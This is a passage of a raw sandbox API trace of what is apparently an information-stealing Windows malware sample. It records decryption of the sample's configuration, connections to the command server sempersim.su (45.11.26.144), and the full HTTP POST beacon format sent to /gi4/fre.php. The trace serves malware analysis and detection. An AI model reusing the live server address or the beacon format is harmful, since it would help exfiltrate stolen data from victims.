pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0288.920] GetProcessHeap () returned 0x5b0000 [0288.921] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0288.921] GetProcessHeap () returned 0x5b0000 [0288.924] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0288.924] GetProcessHeap () returned 0x5b0000 [0288.925] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3428 | out: hHeap=0x5b0000) returned 1 [0288.925] GetProcessHeap () returned 0x5b0000 [0288.925] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0288.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.926] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0288.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.932] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0288.941] GetProcessHeap () returned 0x5b0000 [0288.941] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0288.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.942] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0288.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.943] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0288.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.944] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.944] GetProcessHeap () returned 0x5b0000 [0288.945] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0288.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.947] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0288.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.948] CryptDestroyKey (hKey=0x5be048) returned 1 [0288.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.949] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0288.949] GetProcessHeap () returned 0x5b0000 [0288.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0288.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.950] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0288.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.951] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0288.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.952] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0288.952] GetProcessHeap () returned 0x5b0000 [0288.952] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0288.952] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0288.956] GetProcessHeap () returned 0x5b0000 [0288.957] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0288.957] socket (af=2, type=1, protocol=6) returned 0x3f4 [0288.957] connect (s=0x3f4, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0289.022] FreeAddrInfoW (pAddrInfo=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0289.022] GetProcessHeap () returned 0x5b0000 [0289.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0289.022] GetProcessHeap () returned 0x5b0000 [0289.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0289.023] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0289.024] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0289.024] GetProcessHeap () returned 0x5b0000 [0289.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0289.024] GetProcessHeap () returned 0x5b0000 [0289.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0289.024] GetProcessHeap () returned 0x5b0000 [0289.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d33e0 [0289.025] GetProcessHeap () returned 0x5b0000 [0289.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0289.025] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0289.026] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0289.026] GetProcessHeap () returned 0x5b0000 [0289.026] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0289.026] GetProcessHeap () returned 0x5b0000 [0289.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0289.027] send (s=0x3f4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0289.028] send (s=0x3f4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0289.029] GetProcessHeap () returned 0x5b0000 [0289.029] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0289.029] recv (in: s=0x3f4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0290.407] GetProcessHeap () returned 0x5b0000 [0290.407] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0290.407] GetProcessHeap () returned 0x5b0000 [0290.408] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0290.408] GetProcessHeap () returned 0x5b0000 [0290.408] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0290.408] GetProcessHeap () returned 0x5b0000 [0290.408] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0290.408] closesocket (s=0x3f4) returned 0 [0290.409] GetProcessHeap () returned 0x5b0000 [0290.409] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0290.409] GetProcessHeap () returned 0x5b0000 [0290.410] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0290.410] GetProcessHeap () returned 0x5b0000 [0290.410] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0290.410] GetProcessHeap () returned 0x5b0000 [0290.411] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0290.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcc8) returned 0x3f4 [0290.413] Sleep (dwMilliseconds=0xea60) [0290.421] GetProcessHeap () returned 0x5b0000 [0290.421] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0290.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.422] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0290.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.428] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0290.434] GetProcessHeap () returned 0x5b0000 [0290.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0290.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.435] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0290.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.436] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0290.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.437] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.437] GetProcessHeap () returned 0x5b0000 [0290.438] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0290.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.440] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0290.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.441] CryptDestroyKey (hKey=0x5bde08) returned 1 [0290.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.442] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0290.442] GetProcessHeap () returned 0x5b0000 [0290.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0290.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.443] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.444] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.445] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.445] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.445] GetProcessHeap () returned 0x5b0000 [0290.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0290.445] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0290.446] GetProcessHeap () returned 0x5b0000 [0290.446] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0290.446] GetProcessHeap () returned 0x5b0000 [0290.446] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0290.446] GetProcessHeap () returned 0x5b0000 [0290.447] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0290.447] GetProcessHeap () returned 0x5b0000 [0290.447] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0290.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.448] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0290.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.456] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0290.463] GetProcessHeap () returned 0x5b0000 [0290.463] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0290.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.464] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0290.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.465] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0290.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.466] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.466] GetProcessHeap () returned 0x5b0000 [0290.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0290.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.472] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0290.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.474] CryptDestroyKey (hKey=0x5be288) returned 1 [0290.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0290.475] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0290.476] GetProcessHeap () returned 0x5b0000 [0290.476] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0290.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.477] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0290.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.479] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0290.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.481] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0290.481] GetProcessHeap () returned 0x5b0000 [0290.481] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0290.481] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd9f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0290.484] GetProcessHeap () returned 0x5b0000 [0290.484] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa20 [0290.484] socket (af=2, type=1, protocol=6) returned 0x3f8 [0290.484] connect (s=0x3f8, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0290.680] FreeAddrInfoW (pAddrInfo=0x5cd9f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0290.696] GetProcessHeap () returned 0x5b0000 [0290.696] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0290.696] GetProcessHeap () returned 0x5b0000 [0290.696] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0290.697] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0290.698] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0290.698] GetProcessHeap () returned 0x5b0000 [0290.698] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0290.698] GetProcessHeap () returned 0x5b0000 [0290.699] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0290.699] GetProcessHeap () returned 0x5b0000 [0290.699] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0290.699] GetProcessHeap () returned 0x5b0000 [0290.699] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0290.700] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0290.700] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0290.700] GetProcessHeap () returned 0x5b0000 [0290.700] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0290.700] GetProcessHeap () returned 0x5b0000 [0290.701] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0290.701] send (s=0x3f8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0290.701] send (s=0x3f8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0290.701] GetProcessHeap () returned 0x5b0000 [0290.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0290.702] recv (in: s=0x3f8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0292.034] GetProcessHeap () returned 0x5b0000 [0292.035] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0292.035] GetProcessHeap () returned 0x5b0000 [0292.035] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0292.035] GetProcessHeap () returned 0x5b0000 [0292.036] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0292.036] GetProcessHeap () returned 0x5b0000 [0292.036] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0292.036] closesocket (s=0x3f8) returned 0 [0292.037] GetProcessHeap () returned 0x5b0000 [0292.037] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa20 | out: hHeap=0x5b0000) returned 1 [0292.037] GetProcessHeap () returned 0x5b0000 [0292.038] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0292.038] GetProcessHeap () returned 0x5b0000 [0292.038] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0292.038] GetProcessHeap () returned 0x5b0000 [0292.038] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0292.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xccc) returned 0x3f8 [0292.041] Sleep (dwMilliseconds=0xea60) [0292.048] GetProcessHeap () returned 0x5b0000 [0292.048] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0292.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.050] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0292.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.076] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0292.087] GetProcessHeap () returned 0x5b0000 [0292.087] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0292.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.088] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0292.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.089] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0292.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.090] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.090] GetProcessHeap () returned 0x5b0000 [0292.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0292.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.091] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0292.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.092] CryptDestroyKey (hKey=0x5bde08) returned 1 [0292.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.093] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0292.093] GetProcessHeap () returned 0x5b0000 [0292.093] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0292.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.094] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.095] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.100] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.101] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.101] GetProcessHeap () returned 0x5b0000 [0292.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0292.101] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0292.101] GetProcessHeap () returned 0x5b0000 [0292.102] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0292.102] GetProcessHeap () returned 0x5b0000 [0292.103] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0292.103] GetProcessHeap () returned 0x5b0000 [0292.103] 